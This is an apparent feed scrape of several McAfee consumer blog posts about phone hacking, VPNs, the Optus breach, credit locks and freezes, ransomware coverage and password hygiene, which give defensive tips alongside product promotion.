Professional hackers can use dedicated technologies that search for vulnerable mobile devices with an open Bluetooth connection. Hackers can pull off these attacks when they are range of your phone, up to 30 feet away, usually in a populated area. When hackers make a Bluetooth connection to your phone, they can possibly access your data and info, yet that data and info must be downloaded while the phone is within range. As you probably gathered, this is a more sophisticated attack given the effort and technology involved. 

SIM card swapping 

In August of 2019, the CEO of Twitter had his SIM card hacked by SIM card swapping scam. SIM card swapping occurs when a hacker contacts your phone provider, pretends to be you, and then asks for a replacement SIM card. Once the provider sends the new SIM to the hacker, the old SIM card will be deactivated, and your phone number will be effectively stolen. This means the hacker has taken control of your phone calls, messages, and so forth. This method of hacking requires the seemingly not-so-easy task of impersonating someone else, yet clearly, it happened to the CEO of a major tech company. Protecting your personal info and identity online can help prevent hackers from impersonating you to pull off this and other crimes.  

Ten tips to prevent your phone from being hacked 

While there are several ways a hacker can get into your phone and steal personal and critical information, here are a few tips to keep that from happening: 

  1. Use comprehensive security software on your phone. Over the years, we’ve gotten into the good habit of using this on our computers and laptops. Our phones? Not so much. Installing security software on your smartphone gives you a first line of defense against attacks, plus several of the additional security features mentioned below. 
  2. Update your phone and its apps. Aside from installing security software, keeping current with updates is a primary way to keep you and your phone safe. Updates can fix vulnerabilities that cybercriminals rely on to pull off their malware-based attacks. Additionally, those updates can help keep your phone and apps running smoothly while also introducing new, helpful features. 
  3. Stay safer on the go with a VPN. One way that crooks can hack their way into your phone is via public Wi-Fi, such as at airports, hotels, and even libraries. These networks are public, meaning that your activities are exposed to others on the network—your banking, your password usage, all of it. One way to make a public network private is with a VPN, which can keep you and all you do protected from others on that Wi-Fi hotspot.  
  4. Use a password manager. Strong, unique passwords offer another primary line of defense. Yet with all the accounts we have floating around, juggling dozens of strong and unique passwords can feel like a task—thus the temptation to use (and re-use) simpler passwords. Hackers love this because one password can be the key to several accounts. Instead, try a password manager that can create those passwords for you and safely store them as well. Comprehensive security software will include one. 
  5. Avoid public charging stations. Charging up at a public station seems so simple and safe. However, some hackers have been known to “juice jack” by installing malware into the charging station. While you “juice up,” they “jack” your passwords and personal info. So what to do about power on the road? You can look into a portable power pack that you can charge up ahead of time or run on AA batteries. They’re pretty inexpensive and easy to track down.  
  6. Keep your eyes on your phone. Preventing the actual theft of your phone is important too, as some hacks happen simply because a phone falls into the wrong hands. This is a good case for password or PIN protecting your phone, as well as turning on device tracking so that you can locate your phone or even wipe it remotely if you need to. Apple provides iOS users with a step-by-step guide for remotely wiping devices, and Google offers up a guide for Android users as well.  
  7. Encrypt your phone. Encrypting your cell phone can save you from being hacked and can protect your calls, messages, and critical information. To check if your iPhone is encrypted can go into Touch ID & Passcode, scroll to the bottom, and see if data protection is enabled (typically this is automatic if you have a passcode enabled). Android users have automatic encryption depending on the type of phone. 
  8. Lock your SIM card. Just as you can lock your phone, you can also lock the SIM card that is used to identify you, the owner, and to connect you to your cellular network. By locking it, keeps your phone from being used on any other network than yours. If you own an iPhone, you can lock it by following these simple directions. For other platforms, check out the manufacturer’s website. 
  9. Turn off your Wi-Fi and Bluetooth when not in use. Think of it as closing an otherwise open door. There are several attacks that a dedicated and well-equipped hacker can make on devices where Wi-Fi and Bluetooth are open and discoverable. Likewise, while not a hack, some retailers will track your location in a store using Bluetooth technology for marketing purposes—so switching it off can protect your privacy in some situations as well. You can easily turn off both from your settings and many phones let you do it from a pulldown menu on your home screen as well. 
  10. Steer clear of third-party app stores. Google Play and Apple’s App Store have measures in place to review and vet apps to help ensure that they are safe and secure. Third-party sites may not have that process in place. In fact, some third-party sites may intentionally host malicious apps as part of a broader scam. Granted, cybercriminals have found ways to work around Google and Apple’s review process, yet the chances of downloading a safe app from them are far greater than anywhere else. Furthermore, both Google and Apple are quick to remove malicious apps once discovered, making their stores that much safer. 

The post How Do Hackers Hack Phones and How Can I Prevent It? appeared first on McAfee Blog.

]]>
McAfee Secure VPN: Now with WireGuard for Faster Speeds and Enhanced Stability https://www.mcafee.com/blogs/internet-security/mcafee-secure-vpn-now-with-wireguard-for-faster-speeds-and-enhanced-stability/ Thu, 29 Sep 2022 13:00:13 +0000 https://www.mcafee.com/blogs/?p=159557

McAfee’s Secure VPN now supports the WireGuard protocol, which gives you faster connection speeds plus enhanced stability and security.   WireGuard...

The post McAfee Secure VPN: Now with WireGuard for Faster Speeds and Enhanced Stability appeared first on McAfee Blog.

]]>

McAfee’s Secure VPN now supports the WireGuard protocol, which gives you faster connection speeds plus enhanced stability and security.  

WireGuard is the latest standard in Virtual Private Network (VPN) technology, and we’re rolling it out across McAfee Secure VPN for Windows which is included in our comprehensive online protection plans. And just as before, it offers smart protection that can be set to automatically turn on when you need it, so you can stay more private and more secure online. 

If you’re new to using a VPN, let’s take a quick look at two of the big things a VPN can do for you. 

It makes you more secure. 

The bank-grade encryption used by a strong VPN shields your data and information while it’s in transit, which makes it difficult for hackers to spy on your connection. (Think of your data and information traveling through a tunnel that no one else can use or see into.) In that way, a VPN makes all kinds of online activities more secure—like banking, shopping, and checking up on your finances, even using your apps.  

It protects your privacy. 

By masking your whereabouts and your IP address, along with encryption that helps keep your activities private, a VPN reduces the personal information that others can collect and track. That includes internet service providers, social media companies, businesses, app developers, websites, and others who gather your data for marketing purposes or for resale to third parties. 

A faster and more stable VPN with WireGuard 

A quick word about what WireGuard is in slightly more detail. It’s a VPN protocol, which is a series of technical rules that govern how your device can securely reach the VPN servers, validate your access to the requests you make online, and encrypt your browsing traffic so that only you can see what you are doing over the internet. WireGuard is one of several protocols that we support, such as the OpenVPN and IKEv2 protocols. While WireGuard improves upon OpenVPN and IKEv2 in many ways, both are still secure and safe ways in which a VPN can connect. 

Now with the latest WireGuard standard in place, our VPN for Windows that comes with all our all-in-one plans offers faster speeds and improved stability compared to what previous standards offered. This gives you the security of a VPN with similar performance as if you were on a fully open connection—along with the added benefit of keeping your browsing and other activities private. 

Taken together, the improved speed and stability give privacy-conscious people a further reason to use a VPN more often than before. Because a VPN can minimize the exposure of data as it transmits to and from your devices, companies and data brokers can potentially learn far less about you, your shopping, your travels, your habits, and any other information that they could possibly collect and otherwise profit from. The more often you use a VPN, the less they can potentially gather. 

For more about VPNs and how ours can keep you more private and secure online, give us a visit here any time. 

 

The post McAfee Secure VPN: Now with WireGuard for Faster Speeds and Enhanced Stability appeared first on McAfee Blog.

]]>
The Optus Data Breach – Steps You Can Take to Protect Yourself https://www.mcafee.com/blogs/security-news/the-optus-data-breach-steps-you-can-take-to-protect-yourself/ Thu, 29 Sep 2022 04:22:27 +0000 https://www.mcafee.com/blogs/?p=159458

Optus, one of Australia’s largest telecommunications carriers, reported news of a data breach that may have compromised the information of...

The post The Optus Data Breach – Steps You Can Take to Protect Yourself appeared first on McAfee Blog.

]]>

Optus, one of Australia’s largest telecommunications carriers, reported news of a data breach that may have compromised the information of current and former customers.

As of this writing, the company has not stated how many customers may have been affected, citing their ongoing investigation in conjunction with law enforcement and Australian government officials

According to Optus, the breach may have included the following:

“Information which may have been exposed includes customers’ names, dates of birth, phone numbers, email addresses, and, for a subset of customers, addresses, ID document numbers such as driver’s license or passport numbers. Payment detail and account passwords have not been compromised.”

Optus is currently notifying customers who may have been affected by this breach with SMS and email messages. However, the company makes an important distinction here:

“We are not sending links in SMS or emails. If customers receive an email or SMS with a link claiming to be from Optus, they are advised that this is not a communication from Optus. Please do not click on any links.”

Often in the wake of such breaches, cybercriminals will send out phony communications that use the name of the company affected. These can include phishing attacks over email and SMS that solicit personal and account information or other tactics that attempt to capitalize on the announced breach.

Optus continues to keep its customers up to date on the latest developments on its website, which includes a comprehensive FAQ that details what happened, what steps are being taken, and what customers can do in the wake of this announcement.

What should I do if I think my information was caught up in the Optus breach?

Any time a data breach occurs, your exposed personal information may be used by those trying to commit identity fraud or theft. Different pieces of personal information can be more useful to them than others.

Some information is directly useful, such as a driver’s license or credit card information because they identify you right away. Others are indirectly helpful, like device IDs, browsing history, geolocation information, and internet protocol addresses. While they don’t identify you on their own, a cybercriminal could piece together your identity if they have enough indirect information about you.

In light of this, there are a few steps you can take to protect yourself in the aftermath of a data breach, which involve a combination of preventative steps and some monitoring on your part.

Work with a credit and identity recovery pro

If you become the victim of fraud or theft after a data breach, a licensed recovery pro can help you restore your credit and identity. If you’ve ever dealt with fraud or theft before, or know someone who has, recovery can be a time-consuming and stressful process if you undertake it alone.  With McAfee+ Advanced, you have around-the-clock support from a restoration expert with limited power of attorney who can take the steps that can help restore your credit and identity.

Working with an expert can lend you extra peace of mind, particularly in a time where there’s plenty of uncertainty. First, you’ll know that a professional is working on your case—a person who knows exactly where to start and what needs to happen for the best possible outcome. Second, you’ll get precious time back, time you’d otherwise have to spend if you took on the process yourself.

Keep an eye out for phishing attacks

As mentioned above, with some personal information in hand, cybercriminals may seek out more. They may follow up a breach with rounds of phishing attacks that direct you to bogus sites designed to steal your personal information—either by tricking you into providing it or by stealing it without your knowledge. So, it’s always wise to keep a skeptical eye open for unsolicited messages or phone calls that ask you for information in some form or other, often in ways that urge or pressure you into acting.

Consider using identity monitoring

An identity monitoring service can monitor your information from email addresses to IDs and phone numbers for signs of breaches so you can take action to secure your accounts before they’re used for identity theft.​ Personal information harvested from data breaches can end up on dark web marketplaces where it’s bought by other cyber criminals so they can launch their own attacks. McAfee monitors the dark web for your personal info and provides early alerts if your data is found, an average of 10 months ahead of similar services.​ We also provide guidance to help you act if your information is found.

Change your passwords and use a password manager

While it does not appear that login information was affected, a password update is still a strong security move. Strong and unique passwords are best, which means never reusing your passwords across different sites and platforms. Using a password manager will help you keep on top of it all, while also storing your passwords securely. Moreover, changing your passwords regularly may make a stolen password worthless because it’s out of date.

Enable two-factor authentication

While a strong and unique password is a good first line of defense, enabling two-factor authentication across your accounts will help your cause by providing an added layer of security. It’s increasingly common to see nowadays where banks and all manner of online services will only allow access to your accounts after you’ve provided a one-time passcode sent to your email or smartphone. If your accounts support two-factor authentication, enable it.

Clean up your personal data online

Mentioned earlier, information stolen in a data breach may indirectly identify you. Yet when pieced together with other information, it can then directly identify you. One way cybercriminals complete this identity picture puzzle is with information provided by data brokers that buy and sell personal information online. However, you can take some control over this. Our Personal Data Cleanup service scans high-risk data broker sites for your personal information and then helps you remove it—which denies cybercriminals the information they may need to commit identity theft.

Check your credit and consider a credit freeze

When personal information gets released, there’s a chance that a hacker, scammer, or thief will put it to use. This may include committing fraud, where they draw funds from existing accounts, and theft, where they create new accounts in a victim’s name.

Even though it’s believed that no payment information was involved in this breach, customers should still take steps to monitor their statements and their overall credit report so that they can spot and address any unusual activity. Optus has announced that it will offer affected customers 12 months of credit and identity monitoring through Equifax, one of the major global credit agencies, at no cost.

Another step that customers can take is to place a credit freeze on their credit reports with the major credit agencies in Australia— Equifax, illion, and Experian. This will help prevent cybercriminals from opening new lines of credit or taking out loans in a victim’s name by “freezing” their credit report so that potential creditors cannot pull it for reference. Terms of freezing a credit report will vary, so check with each agency for details.

Consider using comprehensive online protection

A complete suite of online protection software can offer layers of extra security for future protection. In addition to more private and secure time online with a VPN, identity monitoring, and password management, protection like McAfee+ Advanced includes web browser protection that can block malicious and suspicious links that could lead you down the road to malware or a phishing scam—which antivirus protection can’t do alone.

Should I replace my driver’s license and passport for a new ID number?

Per Optus, a subset of those affected may have had their driver’s license and/or passport ID number affected by the breach. Given that license and passport ID numbers are such unique pieces of personally identifiable information, anyone notified by Optus that theirs may have been affected should strongly consider changing them.

The process for replacing either document will vary depending on your state or territory. Given the scope of the attack, some states and territories have proposed making exceptions to the rules for attack victims. As of this writing, that picture continues to evolve, so look to your local government for guidance.

The Optus data breach – you have ways to protect yourself

Not all data breaches make the news. Businesses and organizations, large and small, have all fallen victim to them, and with regularity. The measures you can take here are measures you can take even if you don’t believe you were caught up in the Optus breach. As you can see, several of them are preventative, which is important because word of data breaches tend to reach customers days, weeks, or even months after they’ve been discovered—leaving cybercriminals plenty of opportunity to commit all kinds of identity crime in the meantime.

In this case, the breach certainly made the news due to its apparent size and scale. And as Optus works with law enforcement and government officials, more details into the attack and who has been affected will arise.

However, you have every reason to act now rather than wait for additional news. Staying on top of our credit and identity has always been important, but given all the devices, apps, and accounts we keep these days leaves us more exposed than ever, making protecting ourselves a must.

The post The Optus Data Breach – Steps You Can Take to Protect Yourself appeared first on McAfee Blog.

]]>
Credit Lock and Credit Freeze: Which Service Is Best for You? Both! https://www.mcafee.com/blogs/internet-security/credit-lock-and-credit-freeze-which-service-is-best-for-you-both/ Wed, 28 Sep 2022 17:36:07 +0000 https://www.mcafee.com/blogs/?p=159555

Are you hoping to buy a house or apply for a car, personal, or business loan at some point? A...

The post Credit Lock and Credit Freeze: Which Service Is Best for You? Both! appeared first on McAfee Blog.

]]>

Are you hoping to buy a house or apply for a car, personal, or business loan at some point? A great credit score helps to achieve all those things. You never know the twists and turns life might take you, so even if these financial milestones aren’t on your radar now, it’s nice to know that a great credit score will open many doors for you when you’re ready. The better your credit score, the more likely you are to get the loan you want at the best interest rate. People spend years (even decades!) working to improve their credit scores to unlock numerous opportunities. In the blink of an eye though, a credit fraudster can erase all that hard work and inflict long-term credit damage. It can cost huge sums to repair and take years to correct.  

Many people feel lost on how to prevent these problems or what to do if they suspect identity theft. Luckily, new McAfee services called credit lock and security freeze, which includes credit freeze, are great tools to add to your credit protection toolbelt. They’ll help protect your most personal information from thieves, and both services will help give you the peace of mind you need to confidently go about your day. 

Keep reading to learn more about McAfee’s credit lock and security freeze and find out how you can use them to help you from the negative consequences of identity theft.  

First, What Is Credit Fraud? 

Credit fraud is a type of identity theft where a criminal uses your information to borrow money, open a new credit or debit card, or uses your card to make purchases that they never intend to pay off. Then, when the loan defaults and the bills stack up, the victim is often left with their credit score in shambles. 

According to the FTC, credit fraud is the most common type of identity theft in 2020 and 2021, receiving nearly 18,000 reports from people saying that someone used their information to gain illegal access to their credit card accounts.1 

What Are McAfee Credit Lock and Security Freeze? 

To make sure we’re all on the same page, here are quick definitions of McAfee’s credit lock and security freeze services. 

  • Credit lock. A service that provides a very quick and easy way to lock your credit information with one of the major credit bureaus when your personal information is compromised and also can be used as a preventive measure. You can quickly turn the function on or off at will for TransUnion through the McAfee Protection Center. 
  • Security freeze. A service that provides guidance and the contact information to set up credit, bank, and utility freezes. A credit freeze can be set up with each of the three main credit bureaus, TransUnion, Equifax, and Experian. The credit freeze prevents most credit-related fraud by preventing companies from accessing your credit reports, a step that’s necessary to open a loan, credit card, and more in your name. A credit freeze requires more information than a credit lock to set up and usually takes 24 hours to apply or remove. 

A credit lock and a credit freeze both stop companies from accessing your credit information without your consent when an application for a loan or credit card is submitted. The main difference lies in their speed and credit bureau coverage. By toggling a switch in the McAfee Protection Center, turning on a credit lock is almost instantaneous. A credit freeze can take up to a day to enable or remove; however, it may offer stronger financial loss protection in most U.S. states if an unauthorized line of credit goes through while all three credit bureaus are frozen. Also, McAfee’s credit lock stops one credit bureau from accessing your account, while a credit freeze enables you to halt all three.   

Just make sure that you unlock and unfreeze your credit before you do the following: 

  • Apply for a loan 
  • Apply for a credit card 
  • Make a large purchase that requires financing, such as an expensive home appliance, car, or house 
  • Refinance your mortgage 

These are all situations where a bank or creditor will need to access your credit files. Luckily, with significant purchases and financing opportunities like these, you usually plan ahead, so you should have plenty to time to enable access to your credit. To unlock your credit, just click the credit lock toggle. To unlock a freeze, use the same provided links, sign into your account, and follow the instructions from there. 

To further help you decide which service may be best for your needs, here are the situations where credit lock and credit freeze would be most helpful. 

What Is Credit Lock Most Effective Against? 

McAfee credit lock lets you simply toggle on and off one credit bureau’s ability to access your credit report. Usually, filing a lock on your credit with a bureau requires filling out forms and remembering a PIN to apply or remove a lock. Not with McAfee’s credit lock! You can turn a lock on and off at will through the McAfee Protection Center. 

Convenience and blazing speed are ideal in situations where you’re worried that a criminal has your personal information and may use it to open accounts in your name that could then damage your well-earned great credit. Some people may choose to always have the credit lock enabled and only unlock it when they’re applying for a credit card or loan. That way, they can feel better about the safety of their credit score. 

What Is Credit Freeze Most Effective Against? 

Credit freeze provides protection and peace of mind just like credit lock; however it enables you to freeze your account at all three major credit bureaus. When creditors check your credit score, they could do so with any credit bureau. If you only freeze one bureau’s access to your information, that still leaves the other two to make inquiries, so it’s important to set up a freeze for each one to cover all your bases.  

As mentioned, a credit freeze is just one type of security freeze offered by McAfee. If you’re worried about an identity thief opening not just credit cards, but also utility and/or bank accounts in your name, McAfee’s utility freeze and bank freeze may be additional services for you. Security freeze helps stop unauthorized fraud attempts by giving you quick links and phone numbers. Having all these contact details in one place really speeds up the process and takes the guesswork out of if you’re contacting the correct offices. 

Preventing Identity Theft Is Key 

Dealing with identity theft or credit fraud is a scary and stressful situation. That’s why McAfee is here with tools that help you protect you. Credit lock and credit freeze may help you feel calmer in a situation of suspected or real identity theft and gives you peace of mind to help prevent credit fraud from happening in the first place. Speed is of the utmost importance when foiling a criminal, so both solutions are easy to use with intuitive design so you’re not wasting time trying to figure out how they work. Plus, neither will affect your credit score. They just stop creditors from looking at your credit files, while you continue to boost your credit with your smart habits. 

With both credit lock or credit freeze in your back pocket, you can feel more secure knowing you’re better protected from credit fraud. 

1Fortunly, “20 Worrying Identity Theft Statistics for 2022 

The post Credit Lock and Credit Freeze: Which Service Is Best for You? Both! appeared first on McAfee Blog.

]]>
Help! I Think My Phone’s Been Hacked https://www.mcafee.com/blogs/mobile-security/help-i-think-my-phones-been-hacked/ Tue, 27 Sep 2022 13:15:35 +0000 https://www.mcafee.com/blogs/?p=127025

“My phone’s been hacked!” Words you probably don’t want to hear or say. Ever.  Your phone gets to be like...

The post Help! I Think My Phone’s Been Hacked appeared first on McAfee Blog.

]]>

“My phone’s been hacked!” Words you probably don’t want to hear or say. Ever. 

Your phone gets to be like an old friend after a while. You have things laid out the way you like, your favorite apps are at the ready, and you have the perfect home screen and wallpaper all loaded up. So, if you unlock your phone one day and notice that something is a little … off, you’ll know pretty quickly. And it could be a sign that your phone may be hacked.  

How to know if your phone is hacked? 

It’s often pretty easy to tell when a piece of your tech isn’t working quite right. The performance is off, things crash, and so on. While there are several cases where there’s a legitimate technical issue behind that, it could also be the sign of a hacked device.  

Many hacks and attacks involve the installation of malware on the device, which eats up system resources, creates conflicts with other apps, and uses your data or internet connection to pass along your personal information—all of which can make your smartphone feel a little off. 

A few examples follow. Note that these may be signs of a hacked phone, yet not always. 

Performance hits and battery drain 

A suddenly sluggish phone or one that simply can’t hold a charge anymore are often attributed to phones that are getting a little old (these things happen). Yet, those same behaviors can also be signs of a compromised phone. For example, malicious bitcoin miners can run in the background and cause all types of performance issues because they eat up battery life and take up resources that your phone could otherwise normally use. In a way, it’s like having a second person using your phone at the same time you are. 

Your phone feels like it’s running hot 

Similar to the performance issues mentioned above, malware or mining apps running in the background can burn extra computing power, battery life, and data. Aside from a performance hit, they can cause your phone to physically run hot or even overheat. So if your phone feels like it’s been sitting in the sun, this could be a sign that malware is present. 

Popups suddenly appear on your phone 

If you’re seeing more popup ads than usual or seeing them for the first time, it could be a sign that your phone has been hit with adware—a type of malicious app that hackers use to generate revenue by distributing ads without the consent of the user. Furthermore, those ads may be malicious in nature as well (which is a good reminder to never click on them). Such ads may lead to bogus products and services or pages designed to steal personal information. All in all, malicious adware is what hackers prop up to make money off unsuspecting people. 

Mysterious apps, calls, or texts appear 

A potential telltale sign that your phone has been hacked is the appearance of new apps that you didn’t download, along with spikes in data usage that you can’t account for. Likewise, if you see calls in your phone bill that you didn’t make, that’s a warning as well. 

You run out of data or see unknown charges pop up 

Big red flag here. Like seeing an unknown charge or payment in your bank statement, this is a possible sign that a hacker has hijacked your phone and is using it to transfer data, make purchases, send messages, or make calls via your phone.  

What to do if your phone is hacked? 

  • Install and run security software on your smartphone if you haven’t already. From there, delete any apps you didn’t download, delete risky texts, and then run your mobile security software again. 
  • If you still have issues, wiping and restoring your phone is an option. Provided you have your photos, contacts, and other vital info backed up in the cloud, it’s a relatively straightforward process. A quick search online can show how to wipe and restore your model of phone. 
  • Lastly, check your accounts and your credit card statements to see if any unauthorized purchases have been made. If so, you can go through the process of freezing those accounts and getting new cards and credentials issued. Further, update your passwords for your accounts with a password that is strong and unique to prevent further theft.  

Five tips to keep your phone from getting hacked  

To help keep your phone from getting hacked in the first place, there are a few relatively easy steps you can take. Inside of a few minutes, you can find yourself much safer than you were before.  

1. Use comprehensive security software on your phone. Over the years, we’ve gotten into the good habit of using this on our computers and laptops. Our phones? Not so much. Installing security software on your smartphone gives you the first line of defense against attacks, plus several of the additional security features mentioned below. 

2. Stay safer on the go with a VPN. One way that crooks can hack their way into your phone is via public Wi-Fi, such as at airports, hotels, and even libraries. These networks are public, meaning that your activities are exposed to others on the network—your banking, your password usage, all of it. One way to make a public network private is with a VPN, which can keep you and all you do protected from others on that Wi-Fi hotspot.  

3. Use a password manager. Strong, unique passwords offer another primary line of defense. Yet with all the accounts we have floating around, juggling dozens of strong and unique passwords can feel like a task—thus the temptation to use (and re-use) simpler passwords. Hackers love this because one password can be the key to several accounts. Instead, try a password manager that can create those passwords for you and safely store them as well. Comprehensive security software will include one. 

4. Avoid public charging stations. Charging up at a public station seems so simple and safe. However, some hackers have been known to “juice jack” by installing malware into the charging station. While you “juice up,” they “jack” your passwords and personal info. So what to do about power on the road? You can look into a portable power pack that you can charge up ahead of time or run on AA batteries. They’re pretty inexpensive and can prevent malware from a public charging station.  

5. Keep your eyes on your phone. Preventing the actual theft of your phone is important too, as some hacks happen simply because a phone falls into the wrong hands. This is a good case for password or PIN protecting your phone, as well as turning on device tracking so that you can locate your phone or even wipe it remotely if you need to. Apple provides iOS users with a step-by-step guide for remotely wiping devices and Google offers up a guide for Android users as well.  

Phone acting funny? Follow up. 

A phone that’s acting a little funny may indicate a run-of-the-mill tech issue, yet it could also be a tell-tale sign of a hack. At a minimum, following up on your gut instinct that something isn’t quite right can take care of a nagging tech issue. But in the event of a possible hack, it can save you the far greater headache of unauthorized charges and purchases, and even identity theft. If you spot a problem, it absolutely pays to take a closer look. Follow up with tech support for help, whether that’s through your device manufacturer, retailer, or your antivirus providers. They’ll help pinpoint the issue and get you on your way. 

The post Help! I Think My Phone’s Been Hacked appeared first on McAfee Blog.

]]>
All-New Ransomware Coverage Opens Up the Path to Recovery https://www.mcafee.com/blogs/privacy-identity-protection/all-new-ransomware-coverage-opens-up-the-path-to-recovery/ Tue, 27 Sep 2022 11:09:53 +0000 https://www.mcafee.com/blogs/?p=158801

Our all-new ransomware coverage is now available, ready to help just in case—all backed by expert advice to help you...

The post All-New Ransomware Coverage Opens Up the Path to Recovery appeared first on McAfee Blog.

]]>

Our all-new ransomware coverage is now available, ready to help just in case—all backed by expert advice to help you find the quickest and best possible path to recovery. 

Ransomware coverage from McAfee can reimburse you up to $25,000 for losses resulting from a ransomware threat, including financial losses and ransom fees. You’ll find this ransomware coverage included with our McAfee+ Ultimate plan. 

As well as eligibility for ransomware reimbursement, our team of experts can help you: 

  • Determine the severity of a ransomware attack. 
  • Learn what immediate action steps you can take. 
  • Determine if a ransom should be paid or if alternative options exist. 
  • Facilitate the ransom payment when, and if, necessary. 

However, it’s important to realize that ransomware is unlike any other attack. When ransomware locks someone out of their device or encrypts their data and files so they can’t use them, a demand is usually made for money. Sometimes, paying the ransom results in the device being made accessible again or the files being decrypted. Yet like any ransom case, this result is not always guaranteed. There are plenty of cases where people pay the ransom but never get their data or access to their devices back. 

Again, our coverage includes guidance from our expert advisers to help walk you through your options should the worst happen to you. You won’t be in it alone—particularly as you look to recover from what can be a complicated attack. 

What is ransomware? 

As the name implies, ransomware is a type of malware that holds your device or information for ransom. It may lock your computer or smartphone entirely or it may you out of your files by encrypting them so that you can’t access them. Whether it’s a hacker or a cybercrime organization behind the attack, the bad actor involved holds the key to unlock those files—and promises to do so. For a price. And as mentioned above, sometimes that doesn’t happen, even if you pay. 

Ransomware can infect your devices several different ways: 

  • Malware sites, where bad actors direct you to the site with the aim of having you download the malware package or by uploading it to you through your browser without your knowledge. 
  • Phishing attacks, whether via an email, direct message, text, or any other form of electronic message, bad actors will embed either links or attachments that can lead to ransomware ending up on your device. 
  • Network or device compromise, which may include a bad actor taking advantage of a security loophole or simply accessing the network or device with a stolen or hacked password. 

A brief history of ransomware 

Ransomware has seen quite the evolution over the years. Its origins date back to the late 1980s, where malware-loaded floppy disks were sent to users who installed them under false pretenses. There the malware would lie in wait until the user rebooted their computer for the 90th time and presented with a digital ransom note. 

Early example of ransomware - Source, Wikipedia
Early example of ransomware – Source, Wikipedia

From there, ransomware attacks on individuals became more sophisticated, and more lucrative, with the advent of the internet and the millions of everyday users who flocked to it. Using phishing emails, malware downloads from phony sites, and compromised software and networks, hackers rapidly expanded their ransomware reach.  

However, yet more lucrative for hackers and organized cybercriminals were public and private organizations. Shifting their attacks to so-called “big game” targets, hackers and organized cybercriminals have used ransomware to extort money from hospitals, city governments, financial institutions, and key energy infrastructure companies, to name just a few. Seeing further opportunity, ransomware attackers then began targeting smaller and mid-sized businesses as well. While the ransom demands account for lower amounts, these organizations often lack dedicated cybersecurity teams and the protections that come along with them, making these organizations easier to victimize. 

Meanwhile, the body of malicious code and attack packages used to launch ransomware attacks has only grown. As a result, small-time hackers and hacking groups can find the tools they need to conduct an attack for sale or for lease as a service (Ransomware as a Service, or RaaS). In effect, these bad actors can simply access a dark web marketplace and figuratively pull a ready-to-deploy attack off the shelf. 

As a result, ransomware remains a concern for individuals, even as businesses and governmental bodies of all sizes deal with its threat. 

Protecting yourself from ransomware attacks 

What makes ransomware so damaging is just how much effort it can take to undo. Setting aside the sophisticated attacks on businesses and governments for a moment, even those “off-the-shelf” attacks that some hackers will launch against individuals go beyond the average user’s ability to undo. For example, there are some known attacks with known methods of decrypting the data, however, that requires knowing specifically which attack was used. Attempting to undo the encryption with the wrong solution can potentially encrypt that data even more. 

So without question, the best defense against ransomware is prevention. Comprehensive online protection software gives you the tools you need to help avoid becoming a ransomware victim. A few include: 

  • Safe surfing features that steer you clear of malicious downloads, attachments, and websites. 
  • Strong antivirus that detects and neutralizes the latest malware threats with the latest virus definitions. 
  • Vulnerability scanners that help keep your device and its apps up to date with the latest security measures.   
  • A firewall that helps prevent intruders from accessing the devices on your home network—and the files on them. 

Moreover, you can protect yourself further by backing up your files and data. A cloud storage solution,121cwdv 1765ujb n4yh that’s secured with a strong and unique password, offers one path. Likewise, you can back up your files on an external disk or drive, making sure to keep it disconnected from your network and stored in a safe place. 

Also as mentioned in the bullets above, keep your operating system and apps current with the latest updates. Beyond making improvements in your operating system and apps, updates often also address security issues that hackers often use to compromise devices and apps. 

Lastly, stay alert. Keep an eye out for sketchy links, attachments, websites, and messages. Bad actors will pull all kinds of phishing tricks to lure you their way, places where they try to compromise you, your devices, and data. 

Taken together, the combination of online protection software and a few preventative steps can greatly reduce the chance that you’ll fall victim to ransomware. From there, you also have the assurance of our ransomware coverage, ready to get on the path to recovery, just in case. 

The post All-New Ransomware Coverage Opens Up the Path to Recovery appeared first on McAfee Blog.

]]>
How Often Should You Change Your Passwords? https://www.mcafee.com/blogs/tips-tricks/how-often-should-you-change-your-passwords/ Fri, 23 Sep 2022 13:52:11 +0000 https://www.mcafee.com/blogs/?p=151792

When it comes to passwords, most of us would love nothing more than to set it and forget it. But...

The post How Often Should You Change Your Passwords? appeared first on McAfee Blog.

]]>

When it comes to passwords, most of us would love nothing more than to set it and forget it. But that’s exactly what hackers are hoping for — in fact, it makes their job a lot easier. This means the best line of defense is frequent password changes 

But how often should you create new passwords? Cybersecurity experts recommend changing your password every three months. There may even be situations where you should change your password immediately, especially if a cybercriminal has access to your account.  

This article explores those exact situations and covers some of the best password practices you can use to help safeguard these important combinations of letters and numbers.  

Situations when you should immediately change your password

There are some situations where you’ll want to change your password immediately. 

Your account was hacked

If you think someone has hacked your account, it’s important to act fast and change your password. Did everyone in your address book get a strange email that looks like it’s from you? Change your email password. Are your Facebook friends getting a new friend request from you? Something’s not right, so you’ll want to change your password.  

This can help limit the amount of time a cybercriminal has access to your account.  

After a data breach

If there’s a password breach at work or within a company you do business with, you’ll want to change the password for any affected accounts. If you use that password for any other websites, you’ll definitely want to change your password to those accounts. If hackers get access to your password, they may try it on multiple websites to see what else they can steal. 

You used an unsecure network

As much as possible, try to avoid logging into your secure accounts on public Wi-Fi, such as at a library or cafe. Generally, an unsecure network means your online activity is public. If you need to use an unsecure network, change your password once you’re on a secure network.  

It can also be a good idea to look into a smart VPN like McAfee Secure VPN, which automatically turns on to protect your personal data and credit card information even if you need to use public Wi-Fi.  

You discover malware

Your personal information could be at risk if malware infects your computer. If you have quality antivirus software (like what’s included in McAfee Total Protection) and it detects malware, you’ll want to change your passwords from another device.  

You remove people from the account

If you no longer have contact with someone, there’s no need for them to remain on your Netflix or Amazon account. There’s also no need for an ex to share a bank account or have mobile app access. Create new passwords when you’re no longer sharing an account with someone. 

You no longer use certain accounts

You may have an account you haven’t used in a year, such as from an online retailer. Change old passwords for seldom-used accounts and close the account if you don’t intend to use it again. 

How to create a strong password

A good password can make it more difficult for hackers to access your accounts. But what exactly makes a strong password? Here are a few criteria. 

  • It’s used only for one account. While it can be easy to use similar passwords for multiple accounts, hackers might be able to get into your other online accounts if they access just one.  
  • It’s at least 12 characters long. To make it easy to remember, use a lyric from a song or poem (for example, “andtherocketsredglare”). Or make an abbreviation from the words in a sentence (changing “the quick brown fox jumped over the lazy dog in the backyard” to “tqbfjotlditb,” for instance).  
  • It’s a complex password. Include at least one capital letter, one number, and one symbol. A computer can guess a password with eight letters immediately. But a 12-character password with at least one uppercase and one lowercase letter, number, and a special character would take 34,000 years to crack. Some sites allow users to create a passphrase. That’s a string of words that can be up to 100 characters long. 
  • It’s hard to guess. Don’t use information that people who know you or look at your social media can guess. Avoid personal information like your nickname or initials, birthday, address or street name, or a child or pet’s name. 
